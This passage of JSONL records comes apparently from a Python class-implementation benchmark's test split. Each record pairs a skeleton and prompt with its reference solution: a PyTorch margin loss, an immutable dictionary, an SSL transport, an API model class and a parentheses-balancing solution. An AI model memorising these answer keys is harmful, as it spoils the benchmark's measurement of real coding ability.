self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n<|end_body_1|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass MarginLoss:\n\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. 
Returns: Nothing!\"\"\"\n <|body_0|>\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MarginLoss:\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\"\"\"\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_Confusezius_Deep_Metric_Learning_Baselines.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "ae5bf63ab906639b1019c584f295a456ac4a63cd", "bodies": ["if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\nsuper(ImmutableDictionary, self).__init__(dictionary)", "if name in self:\n return self[name]\ntry:\n return self[name]\nexcept KeyError:\n raise 
AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))"], "bodies_text": "<|body_start_0|>\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n<|end_body_0|>\n\n<|body_start_1|>\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ImmutableDictionary", "detected_licenses": ["GPL-1.0-or-later", "GPL-2.0-or-later", "OFL-1.1", "MS-PL", "AFL-2.1", "GPL-2.0-only", "Python-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause", "LicenseRef-scancode-free-unknown"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ImmutableDictionary:\n\n def __init__(self, dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n <|body_0|>\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n<|end_body_0|>\n\n<|body_start_1|>\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000497", "length_bytes": 7150, "license_type": "permissive", "methods": [{"docstring": "Recursively turn dict to ImmutableDictionary", "name": "__init__", "signature": "def __init__(self, dictionary)"}, {"docstring": "Access to self['attribute'] as self.attribute", "name": "__getattr__", "signature": "def __getattr__(self, name)"}], "n_methods": 2, "prompt": "Implement the Python class `ImmutableDictionary` described below.\n\nClass description:\nImplement the ImmutableDictionary class.\n\nMethod signatures and docstrings:\n- def __init__(self, dictionary): Recursively turn dict to ImmutableDictionary\n- def __getattr__(self, name): Access to self['attribute'] as self.attribute", "prompted_full_text": "Implement the Python class `ImmutableDictionary` described below.\n\nClass description:\nImplement the ImmutableDictionary class.\n\nMethod signatures and docstrings:\n- def __init__(self, dictionary): Recursively turn dict to ImmutableDictionary\n- def __getattr__(self, name): Access to self['attribute'] as self.attribute\n\n<|skeleton|>\nclass ImmutableDictionary:\n\n def __init__(self, dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n <|body_0|>\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n<|end_body_0|>\n\n<|body_start_1|>\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n<|end_body_1|>\n", "revision_id": "23881f23577a65de396238998e8672d6c4c5a250", "skeleton": "<|skeleton|>\nclass ImmutableDictionary:\n\n def __init__(self, 
dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n <|body_0|>\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ImmutableDictionary:\n def __init__(self, dictionary):\n \"\"\"Recursively turn dict to ImmutableDictionary\"\"\"\n if not isinstance(dictionary, ImmutableDictionary):\n for k, v in dictionary.iteritems():\n dictionary[k] = Utils.make_immutable(v)\n super(ImmutableDictionary, self).__init__(dictionary)\n\n def __getattr__(self, name):\n \"\"\"Access to self['attribute'] as self.attribute\"\"\"\n if name in self:\n return self[name]\n try:\n return self[name]\n except KeyError:\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, name))\n", "source": "the_stack_v2_python_sparse", "source_path": "ambari-agent/src/main/python/ambari_agent/Utils.py", "source_repo": "apache/ambari", "split": "test", "star_events_count": 2078} {"blob_id": "6da4425102b6b5847d98115febd4c17c7c8654bf", "bodies": ["if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\nelse:\n self.sslobj = socket.ssl(self.sock)", "result = self.sslobj.read(n)\nwhile len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\nreturn result", "while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]"], "bodies_text": "<|body_start_0|>\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.sslobj.read(n)\n while len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]\n<|end_body_2|>\n", "class_docstring": "Transport that works over SSL", "class_name": "SSLTransport", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n <|body_0|>\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. 
somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n <|body_1|>\n\n def _write(self, s):\n \"\"\"Write a string out to the SSL socket fully.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.sslobj.read(n)\n while len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000498", "length_bytes": 5384, "license_type": "permissive", "methods": [{"docstring": "Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.", "name": "_setup_transport", "signature": "def _setup_transport(self)"}, {"docstring": "It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.", "name": "_read", "signature": "def _read(self, n)"}, {"docstring": "Write a string out to the SSL socket fully.", "name": "_write", "signature": "def _write(self, s)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007138", "prompt": "Implement the Python class `SSLTransport` described below.\n\nClass description:\nTransport that works over SSL\n\nMethod signatures and docstrings:\n- def _setup_transport(self): Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\n- def _read(self, n): It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\n- def _write(self, s): Write a string out to the SSL socket fully.", "prompted_full_text": "Implement the Python class `SSLTransport` described below.\n\nClass description:\nTransport that works over SSL\n\nMethod signatures and docstrings:\n- def _setup_transport(self): Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\n- def _read(self, n): It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\n- def _write(self, s): Write a string out to the SSL socket fully.\n\n<|skeleton|>\nclass SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n <|body_0|>\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. 
somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n <|body_1|>\n\n def _write(self, s):\n \"\"\"Write a string out to the SSL socket fully.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.sslobj.read(n)\n while len(result) < n:\n s = self.sslobj.read(n - len(result))\n if not s:\n raise IOError('Socket closed')\n result += s\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while s:\n n = self.sslobj.write(s)\n if not n:\n raise IOError('Socket closed')\n s = s[n:]\n<|end_body_2|>\n", "revision_id": "37444fb16b36743c439b0d6c3cac2347e0cc0a94", "skeleton": "<|skeleton|>\nclass SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n <|body_0|>\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n <|body_1|>\n\n def _write(self, s):\n \"\"\"Write a string out to the SSL socket fully.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SSLTransport:\n \"\"\"Transport that works over SSL\"\"\"\n\n def _setup_transport(self):\n \"\"\"Wrap the socket in an SSL object, either the new Python 2.6 version, or the older Python 2.5 and lower version.\"\"\"\n if HAVE_PY26_SSL:\n self.sslobj = ssl.wrap_socket(self.sock)\n self.sslobj.do_handshake()\n else:\n self.sslobj = socket.ssl(self.sock)\n\n def _read(self, n):\n \"\"\"It seems that SSL Objects read() method may not supply as much as you're asking for, at least with extremely large messages. 
somewhere > 16K - found this in the test_channel.py test_large unittest.\"\"\"\n        result = self.sslobj.read(n)\n        while len(result) < n:\n            s = self.sslobj.read(n - len(result))\n            if not s:\n                raise IOError('Socket closed')\n            result += s\n        return result\n\n    def _write(self, s):\n        \"\"\"Write a string out to the SSL socket fully.\"\"\"\n        while s:\n            n = self.sslobj.write(s)\n            if not n:\n                raise IOError('Socket closed')\n            s = s[n:]\n", "source": "the_stack_v2_python_sparse", "source_path": "vendor/amqplib/client_0_8/transport.py", "source_repo": "bopopescu/cc-2", "split": "test", "star_events_count": 0}
{"blob_id": "5733999d4b86225b12dfd80042180415e535018e", "bodies": ["ans = bal = 0\nfor symbol in S:\n    bal += 1 if symbol == '(' else -1\n    if bal == -1:\n        ans += 1\n        bal += 1\nreturn ans + bal", "while '()' in S:\n    S = S.replace('()', '')\nreturn len(S)"], "bodies_text": "<|body_start_0|>\n        ans = bal = 0\n        for symbol in S:\n            bal += 1 if symbol == '(' else -1\n            if bal == -1:\n                ans += 1\n                bal += 1\n        return ans + bal\n<|end_body_0|>\n\n<|body_start_1|>\n        while '()' in S:\n            S = S.replace('()', '')\n        return len(S)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n    def minAddToMakeValid(self, S):\n        \"\"\"Solution 1: exploits the fact that a surplus ')' can never be matched later; bal counts the current balance. A fairly tricky approach: bal maintains a balance that floats between -1, 0 and n. symbol == '(' adds 1, ')' subtracts 1; bal == 0 means everything so far is paired up; bal == -1 means one surplus ')' is left, so ans += 1 counts this extra ')' into the final result (a ')' can never be matched later) and bal += 1 resets it to 0; bal == n means n '(' remain and may still be matched.\"\"\"\n        <|body_0|>\n\n    def minAddToMakeValid1(self, S):\n        \"\"\"A simpler, easier-to-understand method\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        ans = bal = 0\n        for symbol in S:\n            bal += 1 if symbol == '(' else -1\n            if bal == -1:\n                ans += 1\n                bal += 1\n        return ans + bal\n<|end_body_0|>\n\n<|body_start_1|>\n        while '()' in S:\n            S = S.replace('()', '')\n        return len(S)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000499", "length_bytes": 1364, "license_type": "no_license", "methods": [{"docstring": "Solution 1: exploits the fact that a surplus ')' can never be matched later; bal counts the current balance. A fairly tricky approach: bal maintains a balance that floats between -1, 0 and n. symbol == '(' adds 1, ')' subtracts 1; bal == 0 means everything so far is paired up; bal == -1 means one surplus ')' is left, so ans += 1 counts this extra ')' into the final result (a ')' can never be matched later) and bal += 1 resets it to 0; bal == n means n '(' remain and may still be matched.", "name": "minAddToMakeValid", "signature": "def minAddToMakeValid(self, S)"}, {"docstring": "A simpler, easier-to-understand method", "name": "minAddToMakeValid1", "signature": "def minAddToMakeValid1(self, S)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minAddToMakeValid(self, S): Solution 1: exploits the fact that a surplus ')' can never be matched later; bal counts the current balance. A fairly tricky approach: bal maintains a balance that floats between -1, 0 and n. symbol == '(' adds 1, ')' subtracts 1; bal == 0 means everything so far is paired up; bal == -1 means one surplus ')' is left, so ans += 1 counts this extra ')' into the final result (a ')' can never be matched later) and bal += 1 resets it to 0; bal == n means n '(' remain and may still be matched.\n- def minAddToMakeValid1(self, S): A simpler, easier-to-understand method", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minAddToMakeValid(self, S): Solution 1: exploits the fact that a surplus ')' can never be matched later; bal counts the current balance. A fairly tricky approach: bal maintains a balance that floats between -1, 0 and n. symbol == '(' adds 1, ')' subtracts 1; bal == 0 means everything so far is paired up; bal == -1 means one surplus ')' is left, so ans += 1 counts this extra ')' into the final result (a ')' can never be matched later) and bal += 1 resets it to 0; bal == n means n '(' remain and may still be matched.\n- def minAddToMakeValid1(self, S): A simpler, easier-to-understand method\n\n<|skeleton|>\nclass Solution:\n\n    def minAddToMakeValid(self, S):\n        \"\"\"Solution 1: exploits the fact that a surplus ')' can never be matched later; bal counts the current balance. A fairly tricky approach: bal maintains a balance that floats between -1, 0 and n. symbol == '(' adds 1, ')' subtracts 1; bal == 0 means everything so far is paired up; bal == -1 means one surplus ')' is left, so ans += 1 counts this extra ')' into the final result (a ')' can never be matched later) and bal += 1 resets it to 0; bal == n means n '(' remain and may still be matched.\"\"\"\n        <|body_0|>\n\n    def minAddToMakeValid1(self, S):\n        \"\"\"A simpler, easier-to-understand method\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        ans = bal = 0\n        for symbol in S:\n            bal += 1 if symbol == '(' else -1\n            if bal == -1:\n                ans += 1\n                bal += 1\n        return ans + bal\n<|end_body_0|>\n\n<|body_start_1|>\n        while '()' in S:\n            S = S.replace('()', '')\n        return len(S)\n<|end_body_1|>\n", "revision_id": "18c06a96bb14688e4a1d5fb6baf235a6b53bd3ae", "skeleton": "<|skeleton|>\nclass Solution:\n\n    def minAddToMakeValid(self, S):\n        \"\"\"Solution 1: exploits the fact that a surplus ')' can never be matched later; bal counts the current balance. A fairly tricky approach: bal maintains a balance that floats between -1, 0 and n. symbol == '(' adds 1, ')' subtracts 1; bal == 0 means everything so far is paired up; bal == -1 means one surplus ')' is left, so ans += 1 counts this extra ')' into the final result (a ')' can never be matched later) and bal += 1 resets it to 0; bal == n means n '(' remain and may still be matched.\"\"\"\n        <|body_0|>\n\n    def minAddToMakeValid1(self, S):\n        \"\"\"A simpler, easier-to-understand method\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n    def minAddToMakeValid(self, S):\n        \"\"\"Solution 1: exploits the fact that a surplus ')' can never be matched later; bal counts the current balance. A fairly tricky approach: bal maintains a balance that floats between -1, 0 and n. symbol == '(' adds 1, ')' subtracts 1; bal == 0 means everything so far is paired up; bal == -1 means one surplus ')' is left, so ans += 1 counts this extra ')' into the final result (a ')' can never be matched later) and bal += 1 resets it to 0; bal == n means n '(' remain and may still be matched.\"\"\"\n        ans = bal = 0\n        for symbol in S:\n            bal += 1 if symbol == '(' else -1\n            if bal == -1:\n                ans += 1\n                bal += 1\n        return ans + bal\n\n    def minAddToMakeValid1(self, S):\n        \"\"\"A simpler, easier-to-understand method\"\"\"\n        while '()' in S:\n            S = S.replace('()', '')\n        return len(S)\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/others/minimum-add-to-make-parentheses-valid.py", "source_repo": "congyingTech/Basic-Algorithm", "split": "test", "star_events_count": 10}
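The records above all share the stack_v2_sparse_python_classes_v1 layout: a "skeleton" string wraps the class in <|skeleton|>/<|end_skeleton|> markers and replaces each method body with a <|body_N|> placeholder, while "bodies" lists the corresponding body sources in order ("bodies_text" repeats them pre-indented between <|body_start_N|> sentinels). A minimal sketch of how a consumer might stitch a record back into runnable source follows; the helper name reassemble, the toy record, and the assumption that each entry in "bodies" carries only its own relative indentation are choices made here, not part of the format itself.

import re

def reassemble(record):
    # Drop the skeleton sentinels; assumes exactly one <|skeleton|> block per record.
    src = record["skeleton"].replace("<|skeleton|>\n", "").replace("\n<|end_skeleton|>", "")
    for i, body in enumerate(record["bodies"]):
        placeholder = "<|body_%d|>" % i
        # Recover the placeholder's indentation so body lines land at method depth.
        match = re.search(r"^([ \t]*)" + re.escape(placeholder), src, flags=re.M)
        indent = match.group(1) if match else " " * 8
        indented = ("\n" + indent).join(body.splitlines())
        src = src.replace(placeholder, indented, 1)
    return src

# Toy record in the same shape as the entries above (contents invented):
record = {
    "skeleton": '<|skeleton|>\nclass Greeter:\n\n    def greet(self, name):\n        """Say hello"""\n        <|body_0|>\n\n<|end_skeleton|>',
    "bodies": ["msg = 'hello ' + name\nreturn msg"],
}
print(reassemble(record))  # prints a complete, executable class definition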
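The AggregatedSubtreeInfo record illustrates the usual SDK deserialization pattern: guard against a None payload, then map the API's camelCase keys (leavesCount, totalLogicalSize) onto snake_case constructor arguments with dict.get, which quietly yields None for absent keys. A hedged usage sketch follows; the @classmethod decorator is an assumption (the record's from_dictionary takes cls, which implies one in the surrounding file), and the payload values are invented except 'kVMware' and 'kSQL', which come from the docstring's enum list.

class AggregatedSubtreeInfo:
    def __init__(self, environment=None, leaves_count=None, total_logical_size=None):
        self.environment = environment
        self.leaves_count = leaves_count
        self.total_logical_size = total_logical_size

    @classmethod  # assumed: the `cls` parameter in the record implies this decorator
    def from_dictionary(cls, dictionary):
        if dictionary is None:
            return None
        environment = dictionary.get('environment')
        leaves_count = dictionary.get('leavesCount')
        total_logical_size = dictionary.get('totalLogicalSize')
        return cls(environment, leaves_count, total_logical_size)

payload = {"environment": "kVMware", "leavesCount": 42, "totalLogicalSize": 10737418240}
info = AggregatedSubtreeInfo.from_dictionary(payload)
assert info.environment == "kVMware" and info.leaves_count == 42
assert AggregatedSubtreeInfo.from_dictionary(None) is None
# Keys missing from the payload fall back to None via dict.get:
assert AggregatedSubtreeInfo.from_dictionary({}).total_logical_size is None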
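The balance-counting method in the final record can be verified by hand. The class below is copied from that record's solution; the test input "()))((" is chosen here for illustration and does not appear in the record. Two surplus ')' characters are folded into ans the moment they appear, and the two '(' characters left in bal at the end can never be closed, so the answer is ans + bal = 2 + 2 = 4.

class Solution:
    def minAddToMakeValid(self, S):
        ans = bal = 0
        for symbol in S:
            bal += 1 if symbol == '(' else -1
            if bal == -1:  # a surplus ')': count it and reset the balance
                ans += 1
                bal += 1
        return ans + bal

    def minAddToMakeValid1(self, S):
        while '()' in S:  # repeatedly erase matched pairs
            S = S.replace('()', '')
        return len(S)     # whatever survives needs an insertion

s = Solution()
assert s.minAddToMakeValid("()))((") == 4
# The replace-based variant agrees: "()))((" -> "))((" and len("))((") == 4.
assert s.minAddToMakeValid1("()))((") == 4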